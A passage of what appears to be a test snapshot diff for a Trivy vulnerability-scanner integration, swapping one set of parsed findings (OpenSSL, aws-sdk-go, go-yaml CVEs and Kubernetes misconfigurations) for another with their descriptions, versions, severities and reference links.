CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6188-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.1.1-r0", - "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2023-2650", - "installedVersion": "3.1.0-r4", - "packageName": "libssl3", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://linux.oracle.com/cve/CVE-2023-2650.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://ubuntu.com/security/notices/USN-6188-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. +The OpenSSL cms and smime command line applications are similarly affected. -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", +" +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", + "name": "use-after-free following BIO_new_NDEF", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6188-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8911", - "installedVersion": "v1.44.245", - "packageName": "github.com/aws/aws-sdk-go", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8911", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", - "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8911", - ], - }, - "category": "Vulnerability", - "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": undefined, - "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8912", - "installedVersion": "v1.44.245", - "packageName": "github.com/aws/aws-sdk-go", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8912", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", - "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8912", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": undefined, - "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8912", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8912", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", - "foundIn": "Target: 'lurker' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-28948", - "installedVersion": "v3.0.0-20210107192922-496545a6307b", - "packageName": "gopkg.in/yaml.v3", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28948", - "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", - "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", - "https://github.com/go-yaml/yaml/issues/666", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", - "https://security.netapp.com/advisory/ntap-20220923-0006/", - "https://www.cve.org/CVERecord?id=CVE-2022-28948", - ], - }, - "category": "Vulnerability", - "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": undefined, - "name": "crash when attempting to deserialize invalid input", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28948", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28948", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/issues/666", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - 